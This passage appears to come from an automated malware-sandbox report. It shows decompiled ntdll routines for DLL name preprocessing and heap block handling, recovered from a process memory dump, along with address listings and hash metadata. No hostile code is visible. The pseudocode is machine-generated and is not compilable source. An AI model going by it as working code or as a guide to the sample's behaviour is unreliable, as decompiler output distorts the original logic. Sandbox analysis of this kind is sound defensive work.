								_t186 = _t62 & 0xffffffc0;
								__eflags = _t186 - 0xfffe;
								if(_t186 > 0xfffe) {
									_t186 = 0xfffe;
								}
								_t145 = _t183[2];
								_t64 =  &(_t183[4]); // 0x1000008
								__eflags = _t145 - _t64;
								if(_t145 == _t64) {
									_t146 = E33D05D60(_t186);
									_v20 = _t146;
									__eflags = _t146;
									if(_t146 == 0) {
										goto L80;
									}
									_t103 =  *_t183 & 0x0000ffff;
									__eflags = _t103;
									if(_t103 != 0) {
										L33D388C0(_t146, _t183[2], _t103);
										_t146 = _v20;
										_t189 = _t189 + 0xc;
									}
									goto L78;
								} else {
									_t146 = E33D73C57(_t186, _t145);
									L78:
									__eflags = _t146;
									if(_t146 == 0) {
										L80:
										_t184 = 0xc0000017;
										L25:
										_t138 = _a8;
										goto L26;
									}
									_t183[2] = _t146;
									_t183[1] = _t186;
									goto L24;
								}
							}
							_t184 = 0xc0000106;
							goto L25;
						}
						L24:
						_t184 = 0;
						L33D388C0(( *_t183 & 0x0000ffff) + _t183[2], _t135[2],  *_t135 & 0x0000ffff);
						_t189 = _t189 + 0xc;
						 *_t183 =  *_t183 + ( *_t135 & 0x0000ffff);
						 *((short*)(_t183[2] + (( *_t183 & 0x0000ffff) >> 1) * 2)) = 0;
						goto L25;
					} else {
						goto L18;
					}
					while(1) {
						L18:
						_t151 =  *_t96 & 0x0000ffff;
						if(_t151 == 0x5c || _t151 == 0x2f) {
							break;
						}
						_t96 = _t96 - 2;
						if(_t96 >= _t168) {
							continue;
						}
						_t138 = _a8;
						goto L22;
					}
					__eflags = L33D2432E(_t135) - 5;
					if(__eflags == 0) {
						_t184 = E33D0C7E7(_t183, _t135);
						goto L25;
					}
					_t112 = E33D123C4(_t135, _t183, __eflags);
					_t138 = _a8;
					_t184 = _t112;
					_t81 = _t135;
					__eflags = _t184;
					if(_t184 < 0) {
						goto L83;
					}
					 *_t138 =  *_t138 | 0x00000600;
					goto L27;
				} else {
					_v5 = 0;
					_v20 =  *[fs:0x30];
					_v7 = 1;
					E33D0DF36(0, _t135, 0x14d0);
					asm("sbb edx, edx");
					if(E33D1015C( *((intOrPtr*)( *[fs:0x30] + 0x38)), _t135,  ~_a4 & _a4 + 0x0000002c,  &_v6,  &_v28) < 0 || _v6 == 0) {
						_t119 = 0x14d3;
					} else {
						__eflags = _v28;
						if(_v28 == 0) {
							_t119 = 0x14d2;
						} else {
							_t119 = 0x14d1;
						}
					}
					E33D0DF36(0, _t135, _t119);
					if(_v6 != 0) {
						__eflags = _v28;
						if(_v28 == 0) {
							_t184 = 0xc0000481;
							goto L14;
						}
						 *_t183 = 0;
						E33D35050(0,  &_v44, E33D001C0());
						E33D0C7E7(_t183,  &_v44);
						E33D0C7E7(_t183, 0x33cc1008);
						_t184 = E33D0C7E7(_t183,  &_v28);
						__eflags = _t184;
						if(_t184 < 0) {
							goto L7;
						}
						_t134 =  *(_v20 + 0x10);
						__eflags = _t134;
						if(_t134 == 0) {
							L53:
							_t128 = 0;
							__eflags = 0;
							L54:
							_t161 = _t183;
							goto L8;
						}
						__eflags =  *(_t134 + 8) & 0x00001000;
						if(( *(_t134 + 8) & 0x00001000) != 0) {
							_t128 = 1;
							goto L54;
						}
						goto L53;
					} else {
						L7:
						_t128 = _v7;
						_t161 = _t135;
						L8:
						if(_t184 < 0) {
							L83:
							__eflags =  *0x33de37c0 & 0x00000003;
							if(( *0x33de37c0 & 0x00000003) != 0) {
								_push(_t184);
								E33D6E692("minkernel\\ntdll\\ldrutil.c", 0xab2, "LdrpPreprocessDllName", 0, "LdrpPreprocessDllName for DLL %wZ failed with status 0x%08lx\n", _t135);
							}
							__eflags =  *0x33de37c0 & 0x00000010;
							if(( *0x33de37c0 & 0x00000010) != 0) {
								asm("int3");
							}
							L40:
							if(_v8 != 0) {
								L33D0C4A0(_v16,  &_v16);
							}
							return _t184;
						} else {
							if(_t128 != 0 &&  *0x33de5d70 == 0) {
								_t136 = E33D09870("true", _t161, 0x33cc116c, 0,  &_v36, 0, 0, 0, 0);
								if(_t136 >= 0) {
									_v5 = 1;
									E33D123C4( &_v36, _t183, __eflags);
									E33D1E3C9( &_v36);
								}
								if(_t136 != 0xc0150008) {
									_t184 = _t136;
								}
								_t135 = _v12;
							}
							L14:
							if(_t184 < 0) {
								goto L83;
							} else {
								_t138 = _a8;
								_t75 = _v5;
								goto L16;
							}
						}
					}
				}
			}










































                                                                                                                                                                                            0x33d0b0de
                                                                                                                                                                                            0x33d0b0e3
                                                                                                                                                                                            0x33d0b0e5
                                                                                                                                                                                            0x33d0b0ef
                                                                                                                                                                                            0x33d581db
                                                                                                                                                                                            0x33d0b0f5
                                                                                                                                                                                            0x33d0b0f5
                                                                                                                                                                                            0x33d0b0f5
                                                                                                                                                                                            0x33d0b0f9
                                                                                                                                                                                            0x33d0b0fc
                                                                                                                                                                                            0x33d0b0fe
                                                                                                                                                                                            0x33d0b100
                                                                                                                                                                                            0x33d0b109
                                                                                                                                                                                            0x33d0b1d5
                                                                                                                                                                                            0x33d0b1d9
                                                                                                                                                                                            0x33d0b1dc
                                                                                                                                                                                            0x33d0b303
                                                                                                                                                                                            0x33d0b30a
                                                                                                                                                                                            0x33d581f8
                                                                                                                                                                                            0x33d581fa
                                                                                                                                                                                            0x33d581ff
                                                                                                                                                                                            0x33d58201
                                                                                                                                                                                            0x33d58201
                                                                                                                                                                                            0x33d58206
                                                                                                                                                                                            0x33d58207
                                                                                                                                                                                            0x33d5821f
                                                                                                                                                                                            0x33d58224
                                                                                                                                                                                            0x33d58227
                                                                                                                                                                                            0x33d58227
                                                                                                                                                                                            0x33d0b312
                                                                                                                                                                                            0x33d0b317
                                                                                                                                                                                            0x33d0b31b
                                                                                                                                                                                            0x33d0b31d
                                                                                                                                                                                            0x33d0b3ff
                                                                                                                                                                                            0x33d0b3ff
                                                                                                                                                                                            0x33d0b323
                                                                                                                                                                                            0x33d0b325
                                                                                                                                                                                            0x33d0b264
                                                                                                                                                                                            0x33d0b266
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33d0b272
                                                                                                                                                                                            0x33d0b2f6
                                                                                                                                                                                            0x33d0b2fb
                                                                                                                                                                                            0x33d0b2fb
                                                                                                                                                                                            0x33d0b278
                                                                                                                                                                                            0x33d0b281
                                                                                                                                                                                            0x33d0b285
                                                                                                                                                                                            0x33d0b2a0
                                                                                                                                                                                            0x33d0b2ac
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33d0b287
                                                                                                                                                                                            0x33d0b287
                                                                                                                                                                                            0x33d0b287
                                                                                                                                                                                            0x33d0b28d
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33d0b292
                                                                                                                                                                                            0x33d0b299
                                                                                                                                                                                            0x33d0b29e
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33d0b29e
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33d0b292
                                                                                                                                                                                            0x33d0b2b3
                                                                                                                                                                                            0x33d0b2b9
                                                                                                                                                                                            0x33d0b2bb
                                                                                                                                                                                            0x33d0b2bd
                                                                                                                                                                                            0x33d0b2ca
                                                                                                                                                                                            0x33d0b2ca
                                                                                                                                                                                            0x33d0b2cc
                                                                                                                                                                                            0x33d0b2d0
                                                                                                                                                                                            0x33d0b2d2
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33d0b2d2
                                                                                                                                                                                            0x33d0b2c0
                                                                                                                                                                                            0x33d0b2c0
                                                                                                                                                                                            0x33d0b2c4
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33d582bf
                                                                                                                                                                                            0x33d582c2
                                                                                                                                                                                            0x33d582c5
                                                                                                                                                                                            0x33d582c7
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33d582cd
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33d0b2c0
                                                                                                                                                                                            0x33d0b285
                                                                                                                                                                                            0x33d0b1e5
                                                                                                                                                                                            0x33d0b1eb
                                                                                                                                                                                            0x33d0b1ef
                                                                                                                                                                                            0x33d0b210
                                                                                                                                                                                            0x33d0b210
                                                                                                                                                                                            0x33d0b213
                                                                                                                                                                                            0x33d0b215
                                                                                                                                                                                            0x33d0b21b
                                                                                                                                                                                            0x33d0b262
                                                                                                                                                                                            0x33d0b262
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33d0b262
                                                                                                                                                                                            0x33d0b225
                                                                                                                                                                                            0x33d0b22d
                                                                                                                                                                                            0x33d5823f
                                                                                                                                                                                            0x33d58245
                                                                                                                                                                                            0x33d58251
                                                                                                                                                                                            0x33d58254
                                                                                                                                                                                            0x33d58257
                                                                                                                                                                                            0x33d5825d
                                                                                                                                                                                            0x33d5825f
                                                                                                                                                                                            0x33d5825f
                                                                                                                                                                                            0x33d58264
                                                                                                                                                                                            0x33d58267
                                                                                                                                                                                            0x33d5826a
                                                                                                                                                                                            0x33d5826c
                                                                                                                                                                                            0x33d5827f
                                                                                                                                                                                            0x33d58281
                                                                                                                                                                                            0x33d58284
                                                                                                                                                                                            0x33d58286
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33d58288
                                                                                                                                                                                            0x33d5828b
                                                                                                                                                                                            0x33d5828e
                                                                                                                                                                                            0x33d58295
                                                                                                                                                                                            0x33d5829a
                                                                                                                                                                                            0x33d5829d
                                                                                                                                                                                            0x33d5829d
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33d5826e
                                                                                                                                                                                            0x33d58275
                                                                                                                                                                                            0x33d582a0
                                                                                                                                                                                            0x33d582a0
                                                                                                                                                                                            0x33d582a2
                                                                                                                                                                                            0x33d582b0
                                                                                                                                                                                            0x33d582b0
                                                                                                                                                                                            0x33d0b25f
                                                                                                                                                                                            0x33d0b25f
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33d0b25f
                                                                                                                                                                                            0x33d582a4
                                                                                                                                                                                            0x33d582a7
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33d582a7
                                                                                                                                                                                            0x33d5826c
                                                                                                                                                                                            0x33d58247
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33d58247
                                                                                                                                                                                            0x33d0b233
                                                                                                                                                                                            0x33d0b236
                                                                                                                                                                                            0x33d0b243
                                                                                                                                                                                            0x33d0b24b
                                                                                                                                                                                            0x33d0b24e
                                                                                                                                                                                            0x33d0b25b
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33d0b1f1
                                                                                                                                                                                            0x33d0b1f1
                                                                                                                                                                                            0x33d0b1f1
                                                                                                                                                                                            0x33d0b1f7
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33d0b206
                                                                                                                                                                                            0x33d0b20b
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33d0b20d
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33d0b20d
                                                                                                                                                                                            0x33d0b3ae
                                                                                                                                                                                            0x33d0b3b1
                                                                                                                                                                                            0x33d58238
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33d58238
                                                                                                                                                                                            0x33d0b3bb
                                                                                                                                                                                            0x33d0b3c0
                                                                                                                                                                                            0x33d0b3c3
                                                                                                                                                                                            0x33d0b3c5
                                                                                                                                                                                            0x33d0b3c7
                                                                                                                                                                                            0x33d0b3c9
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33d0b3cf
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33d0b10f
                                                                                                                                                                                            0x33d0b117
                                                                                                                                                                                            0x33d0b123
                                                                                                                                                                                            0x33d0b129
                                                                                                                                                                                            0x33d0b12d
                                                                                                                                                                                            0x33d0b144
                                                                                                                                                                                            0x33d0b154
                                                                                                                                                                                            0x33d0b160
                                                                                                                                                                                            0x33d0b32d
                                                                                                                                                                                            0x33d0b32d
                                                                                                                                                                                            0x33d0b332
                                                                                                                                                                                            0x33d581e4
                                                                                                                                                                                            0x33d0b338
                                                                                                                                                                                            0x33d0b338
                                                                                                                                                                                            0x33d0b338
                                                                                                                                                                                            0x33d0b332
                                                                                                                                                                                            0x33d0b16a
                                                                                                                                                                                            0x33d0b173
                                                                                                                                                                                            0x33d0b342
                                                                                                                                                                                            0x33d0b347
                                                                                                                                                                                            0x33d581ee
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33d581ee
                                                                                                                                                                                            0x33d0b34f
                                                                                                                                                                                            0x33d0b35c
                                                                                                                                                                                            0x33d0b366
                                                                                                                                                                                            0x33d0b372
                                                                                                                                                                                            0x33d0b381
                                                                                                                                                                                            0x33d0b383
                                                                                                                                                                                            0x33d0b385
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33d0b38e
                                                                                                                                                                                            0x33d0b391
                                                                                                                                                                                            0x33d0b393
                                                                                                                                                                                            0x33d0b39e
                                                                                                                                                                                            0x33d0b39e
                                                                                                                                                                                            0x33d0b39e
                                                                                                                                                                                            0x33d0b3a0
                                                                                                                                                                                            0x33d0b3a0
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33d0b3a0
                                                                                                                                                                                            0x33d0b395
                                                                                                                                                                                            0x33d0b39c
                                                                                                                                                                                            0x33d0b406
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33d0b406
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33d0b179
                                                                                                                                                                                            0x33d0b179
                                                                                                                                                                                            0x33d0b179
                                                                                                                                                                                            0x33d0b17c
                                                                                                                                                                                            0x33d0b17e
                                                                                                                                                                                            0x33d0b180
                                                                                                                                                                                            0x33d582d2
                                                                                                                                                                                            0x33d582d2
                                                                                                                                                                                            0x33d582d9
                                                                                                                                                                                            0x33d582db
                                                                                                                                                                                            0x33d582f3
                                                                                                                                                                                            0x33d582f8
                                                                                                                                                                                            0x33d582fb
                                                                                                                                                                                            0x33d58302
                                                                                                                                                                                            0x33d58308
                                                                                                                                                                                            0x33d58308
                                                                                                                                                                                            0x33d0b2d8
                                                                                                                                                                                            0x33d0b2dc
                                                                                                                                                                                            0x33d0b2e5
                                                                                                                                                                                            0x33d0b2e5
                                                                                                                                                                                            0x33d0b2f2
                                                                                                                                                                                            0x33d0b186
                                                                                                                                                                                            0x33d0b188
                                                                                                                                                                                            0x33d0b1ae
                                                                                                                                                                                            0x33d0b1b2
                                                                                                                                                                                            0x33d0b3dc
                                                                                                                                                                                            0x33d0b3e3
                                                                                                                                                                                            0x33d0b3eb
                                                                                                                                                                                            0x33d0b3eb
                                                                                                                                                                                            0x33d0b1be
                                                                                                                                                                                            0x33d0b3f5
                                                                                                                                                                                            0x33d0b3f5
                                                                                                                                                                                            0x33d0b1c4
                                                                                                                                                                                            0x33d0b1c4
                                                                                                                                                                                            0x33d0b1c7
                                                                                                                                                                                            0x33d0b1c9
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33d0b1cf
                                                                                                                                                                                            0x33d0b1cf
                                                                                                                                                                                            0x33d0b1d2
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33d0b1d2
                                                                                                                                                                                            0x33d0b1c9
                                                                                                                                                                                            0x33d0b180
                                                                                                                                                                                            0x33d0b173

                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.3795336805.0000000033CC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33CC0000, based on PE: true
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_33cc0000_fjerbregners_patrol.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID: API set$DLL %wZ was redirected to %wZ by %s$LdrpPreprocessDllName$LdrpPreprocessDllName for DLL %wZ failed with status 0x%08lx$SxS$minkernel\ntdll\ldrutil.c
                                                                                                                                                                                            • API String ID: 0-122214566
                                                                                                                                                                                            • Opcode ID: 331002c43e98152b201b003b4986c5d1b135edb89e946b51b1f7c1470f97840e
                                                                                                                                                                                            • Instruction ID: 21be079b9b5c192e0d039a1b489a6dd3556e3d5b3f490661c4b8c71b9e37cc63
                                                                                                                                                                                            • Opcode Fuzzy Hash: 331002c43e98152b201b003b4986c5d1b135edb89e946b51b1f7c1470f97840e
                                                                                                                                                                                            • Instruction Fuzzy Hash: C9C15E75F09319ABEB048B74C890B7E7B65EF45F08F584069E841DB290DB74CE45CBA1
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 33D00680 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 414COMMONCrypto
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            C-Code - Quality: 75%
                                                                                                                                                                                            			E33D00680(intOrPtr __ecx, signed int* __edx) {
				signed int* _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char _v20;
				intOrPtr* _v24;
				signed int _v28;
				signed int _v32;
				signed char _v56;
				char _v60;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed char _t136;
				signed int _t141;
				void* _t143;
				signed int* _t145;
				signed int* _t146;
				intOrPtr _t148;
				unsigned int _t150;
				char _t162;
				signed int* _t164;
				signed char* _t165;
				intOrPtr _t166;
				signed int* _t168;
				signed char* _t169;
				signed char* _t171;
				signed char* _t180;
				intOrPtr _t195;
				signed int _t197;
				signed int _t209;
				signed char _t210;
				intOrPtr* _t215;
				intOrPtr _t222;
				signed int _t232;
				intOrPtr* _t242;
				intOrPtr _t244;
				unsigned int _t245;
				intOrPtr _t247;
				intOrPtr* _t258;
				signed char _t264;
				unsigned int _t269;
				intOrPtr _t271;
				signed int* _t276;
				signed int _t277;
				void* _t278;
				intOrPtr _t281;
				signed int* _t287;
				intOrPtr _t288;
				unsigned int _t291;
				unsigned int* _t295;
				intOrPtr* _t298;
				intOrPtr _t300;

				_t231 = __edx;
				_v8 = __edx;
				_t300 = __ecx;
				_t298 = L33D00ACE(__edx,  *__edx);
				if(_t298 == __ecx + 0x8c) {
					L45:
					return 0;
				}
				if( *0x33de6960 >= 1) {
					__eflags =  *(_t298 + 0x14) -  *__edx;
					if(__eflags < 0) {
						_t222 =  *[fs:0x30];
						__eflags =  *(_t222 + 0xc);
						if( *(_t222 + 0xc) == 0) {
							_push("HEAP: ");
							E33CEB910();
						} else {
							E33CEB910("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
						}
						_push("(UCRBlock->Size >= *Size)");
						E33CEB910();
						__eflags =  *0x33de5da8;
						if(__eflags == 0) {
							E33DAFC95(_t231, 1, _t298, __eflags);
						}
					}
				}
				_t136 =  *((intOrPtr*)(_t298 - 2));
				_t4 = _t298 - 8; // -8
				_t232 = _t4;
				if(_t136 != 0) {
					_v12 = (_t232 & 0xffff0000) - ((_t136 & 0x000000ff) << 0x10) + 0x10000;
				} else {
					_v12 = _t300;
				}
				_v20 =  *((intOrPtr*)(_t298 + 0x10));
				_t141 =  *(_t300 + 0xcc) ^  *0x33de6d48;
				_v28 = _t141;
				if(_t141 != 0) {
					 *0x33de91e0(_t300,  &_v20, _v8);
					_t143 = _v28();
					_t276 = _v8;
					goto L13;
				} else {
					_t295 = _v8;
					if( *(_t298 + 0x14) -  *_t295 <=  *(_t300 + 0x6c) << 3) {
						_t269 =  *(_t298 + 0x14);
						__eflags = _t269 -  *(_t300 + 0x5c) << 3;
						if(__eflags < 0) {
							 *_t295 = _t269;
						}
					}
					if(( *(_t300 + 0x40) & 0x00040000) != 0) {
						_push(0);
						_push(0x1c);
						_v16 = 0x40;
						_push( &_v60);
						_push(3);
						_push(_t300);
						_push(0xffffffff);
						_t209 = L33D32BE0();
						__eflags = _t209;
						_t210 = _v56;
						if(_t209 < 0) {
							L61:
							__eflags = 0;
							E33DB5FED(0, _t300, "true", _t210, 0, 0);
							_v16 = 4;
							L62:
							_t276 = _v8;
							goto L8;
						}
						__eflags = _t210 & 0x00000060;
						if((_t210 & 0x00000060) == 0) {
							goto L61;
						}
						__eflags = _v60 - _t300;
						if(__eflags == 0) {
							goto L62;
						}
						goto L61;
					} else {
						_v16 = 4;
						L8:
						_v32 =  *_t276;
						_v28 =  *((intOrPtr*)(_t300 + 0x1f8)) -  *((intOrPtr*)(_t300 + 0x244));
						_t215 = _t300 + 0xd4;
						_v24 = _t215;
						if( *0x33de373c != 0) {
							L11:
							_push(_v16);
							_push(0x1000);
							_push(_t276);
							_push(0);
							_push( &_v20);
							_push(0xffffffff);
							_t143 = E33D32B10();
							_t276 = _v8;
							L12:
							 *((intOrPtr*)(_t300 + 0x21c)) =  *((intOrPtr*)(_t300 + 0x21c)) + 1;
							L13:
							if(_t143 < 0) {
								 *((intOrPtr*)(_t300 + 0x224)) =  *((intOrPtr*)(_t300 + 0x224)) + 1;
								goto L45;
							}
							_t145 =  *( *[fs:0x30] + 0x50);
							if(_t145 != 0) {
								__eflags =  *_t145;
								if(__eflags == 0) {
									goto L15;
								}
								_t146 =  &(( *( *[fs:0x30] + 0x50))[0x89]);
								L16:
								if( *_t146 != 0) {
									__eflags =  *( *[fs:0x30] + 0x240) & 0x00000001;
									if(__eflags != 0) {
										L33DAEFD3(_t232, _t300, _v20,  *_t276, 2);
									}
								}
								if( *((intOrPtr*)(_t300 + 0x4c)) != 0) {
									_t291 =  *(_t300 + 0x50) ^  *_t232;
									 *_t232 = _t291;
									_t264 = _t291 >> 0x00000010 ^ _t291 >> 0x00000008 ^ _t291;
									if(_t291 >> 0x18 != _t264) {
										_push(_t264);
										E33DAD646(_t232, _t300, _t232, _t298, _t300, __eflags);
									}
								}
								 *((char*)(_t232 + 2)) = 0;
								 *((char*)(_t232 + 7)) = 0;
								_t148 =  *((intOrPtr*)(_t298 + 8));
								_t242 =  *((intOrPtr*)(_t298 + 0xc));
								_t277 =  *((intOrPtr*)(_t148 + 4));
								_v32 = _t277;
								_t38 = _t298 + 8; // 0x8
								_t278 = _t38;
								if( *_t242 != _t277 ||  *_t242 != _t278) {
									E33DB5FED(0xd, 0, _t278, _v32,  *_t242, 0);
								} else {
									 *_t242 = _t148;
									 *((intOrPtr*)(_t148 + 4)) = _t242;
								}
								_t150 =  *(_t298 + 0x14);
								if(_t150 == 0) {
									L27:
									_t244 = _v12;
									 *((intOrPtr*)(_t244 + 0x30)) =  *((intOrPtr*)(_t244 + 0x30)) - 1;
									 *((intOrPtr*)(_t244 + 0x2c)) =  *((intOrPtr*)(_t244 + 0x2c)) - ( *(_t298 + 0x14) >> 0xc);
									 *((intOrPtr*)(_t300 + 0x1f8)) =  *((intOrPtr*)(_t300 + 0x1f8)) +  *(_t298 + 0x14);
									 *((intOrPtr*)(_t300 + 0x20c)) =  *((intOrPtr*)(_t300 + 0x20c)) + 1;
									 *((intOrPtr*)(_t300 + 0x208)) =  *((intOrPtr*)(_t300 + 0x208)) - 1;
									_t245 =  *(_t298 + 0x14);
									if(_t245 >= 0x7f000) {
										 *((intOrPtr*)(_t300 + 0x1fc)) =  *((intOrPtr*)(_t300 + 0x1fc)) - _t245;
										_t245 =  *(_t298 + 0x14);
									}
									_t280 = _v8;
									_t154 =  *_v8;
									if(_t245 <=  *_v8) {
										_t281 = _v12;
										__eflags =  *((intOrPtr*)(_t298 + 0x10)) + _t245 -  *((intOrPtr*)(_t281 + 0x28));
										_t280 = _v8;
										if( *((intOrPtr*)(_t298 + 0x10)) + _t245 !=  *((intOrPtr*)(_t281 + 0x28))) {
											 *_t280 =  *_t280 + ( *_t232 & 0x0000ffff) * 8;
											goto L30;
										}
										_t154 =  *_t280;
										goto L29;
									} else {
										L29:
										L33D0096B(_t300, _v12,  *((intOrPtr*)(_t298 + 0x10)) + 0xffffffe8 +  *_t280, _t245 - _t154, _t232, _t280);
										 *_v8 =  *_v8 << 3;
										L30:
										_t247 = _v12;
										 *((char*)(_t232 + 3)) = 0;
										_t282 =  *((intOrPtr*)(_t247 + 0x18));
										if( *((intOrPtr*)(_t247 + 0x18)) != _t247) {
											_t162 = (_t232 - _t247 >> 0x10) + 1;
											_v32 = _t162;
											__eflags = _t162 - 0xfe;
											if(_t162 >= 0xfe) {
												E33DB5FED(3, _t282, _t232, _t247, 0, 0);
												_t162 = _v32;
											}
										} else {
											_t162 = 0;
										}
										 *((char*)(_t232 + 6)) = _t162;
										_t164 =  *( *[fs:0x30] + 0x50);
										if(_t164 != 0) {
											__eflags =  *_t164;
											if( *_t164 == 0) {
												goto L33;
											}
											_t165 =  &(( *( *[fs:0x30] + 0x50))[0x89]);
											L34:
											if( *_t165 != 0) {
												_t166 =  *[fs:0x30];
												__eflags =  *(_t166 + 0x240) & 0x00000001;
												if(( *(_t166 + 0x240) & 0x00000001) == 0) {
													goto L35;
												}
												__eflags = E33D03C40();
												if(__eflags == 0) {
													_t180 = 0x7ffe0380;
												} else {
													_t180 =  &(( *( *[fs:0x30] + 0x50))[0x89]);
												}
												_t299 = _v8;
												E33DAF1C3(_t232, _t300, _t232, __eflags,  *_v8,  *(_t300 + 0x74) << 3,  *_t180 & 0x000000ff);
												L36:
												_t168 =  *( *[fs:0x30] + 0x50);
												if(_t168 != 0) {
													__eflags =  *_t168;
													if( *_t168 == 0) {
														goto L37;
													}
													_t169 =  &(( *( *[fs:0x30] + 0x50))[0x8c]);
													L38:
													if( *_t169 != 0) {
														__eflags = E33D03C40();
														if(__eflags == 0) {
															_t171 = 0x7ffe038a;
														} else {
															_t171 =  &(( *( *[fs:0x30] + 0x50))[0x8c]);
														}
														E33DAF1C3(_t232, _t300, _t232, __eflags,  *_t299,  *(_t300 + 0x74) << 3,  *_t171 & 0x000000ff);
													}
													return _t232;
												}
												L37:
												_t169 = 0x7ffe038a;
												goto L38;
											}
											L35:
											_t299 = _v8;
											goto L36;
										}
										L33:
										_t165 = 0x7ffe0380;
										goto L34;
									}
								} else {
									_t287 =  *(_t300 + 0xb8);
									if(_t287 != 0) {
										_t256 = _t150 >> 0xc;
										__eflags = _t256 - _t287[1];
										if(_t256 < _t287[1]) {
											L79:
											E33D0036A(_t300, _t287, 0, _t298, _t256, _t150);
											goto L24;
										} else {
											goto L75;
										}
										while(1) {
											L75:
											_t197 =  *_t287;
											__eflags = _t197;
											_v32 = _t197;
											_t150 =  *(_t298 + 0x14);
											if(_t197 == 0) {
												break;
											}
											_t287 = _v32;
											__eflags = _t256 - _t287[1];
											if(_t256 >= _t287[1]) {
												continue;
											}
											goto L79;
										}
										_t256 = _t287[1] - 1;
										__eflags = _t287[1] - 1;
										goto L79;
									}
									L24:
									_t258 =  *((intOrPtr*)(_t298 + 4));
									_t195 =  *_t298;
									_t288 =  *_t258;
									if(_t288 !=  *((intOrPtr*)(_t195 + 4)) || _t288 != _t298) {
										E33DB5FED(0xd, 0, _t298,  *((intOrPtr*)(_t195 + 4)), _t288, 0);
									} else {
										 *_t258 = _t195;
										 *((intOrPtr*)(_t195 + 4)) = _t258;
									}
									goto L27;
								}
							}
							L15:
							_t146 = 0x7ffe0380;
							goto L16;
						}
						_t271 =  *_t215;
						if(_t271 != 0) {
							L63:
							_t101 = _t298 - 8; // -8
							_t232 = _t101;
							__eflags = _v28 +  *_t276 - _t271;
							if(__eflags <= 0) {
								goto L11;
							}
							_t220 =  *(_v24 + 4);
							__eflags =  *(_v24 + 4);
							if(__eflags != 0) {
								E33DB5FED(0x15, _t300, 0, _t220, _v32, _v28);
								_t276 = _v8;
							}
							_t143 = 0xc000012d;
							goto L12;
						}
						_t271 =  *0x33de432c; // 0x0
						_v24 = 0x33de432c;
						if(_t271 != 0) {
							goto L63;
						}
						goto L11;
					}
				}
			}
























































                                                                                                                                                                                            0x33d00689
                                                                                                                                                                                            0x33d0068d
                                                                                                                                                                                            0x33d00690
                                                                                                                                                                                            0x33d00699
                                                                                                                                                                                            0x33d006a3
                                                                                                                                                                                            0x33d00929
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33d00929
                                                                                                                                                                                            0x33d006b0
                                                                                                                                                                                            0x33d54e97
                                                                                                                                                                                            0x33d54e99
                                                                                                                                                                                            0x33d54e9f
                                                                                                                                                                                            0x33d54ea5
                                                                                                                                                                                            0x33d54ea9
                                                                                                                                                                                            0x33d54eca
                                                                                                                                                                                            0x33d54ecf
                                                                                                                                                                                            0x33d54eab
                                                                                                                                                                                            0x33d54ec0
                                                                                                                                                                                            0x33d54ec5
                                                                                                                                                                                            0x33d54ed7
                                                                                                                                                                                            0x33d54edc
                                                                                                                                                                                            0x33d54ee4
                                                                                                                                                                                            0x33d54eeb
                                                                                                                                                                                            0x33d54ef6
                                                                                                                                                                                            0x33d54ef6
                                                                                                                                                                                            0x33d54eeb
                                                                                                                                                                                            0x33d54e99
                                                                                                                                                                                            0x33d006b6
                                                                                                                                                                                            0x33d006b9
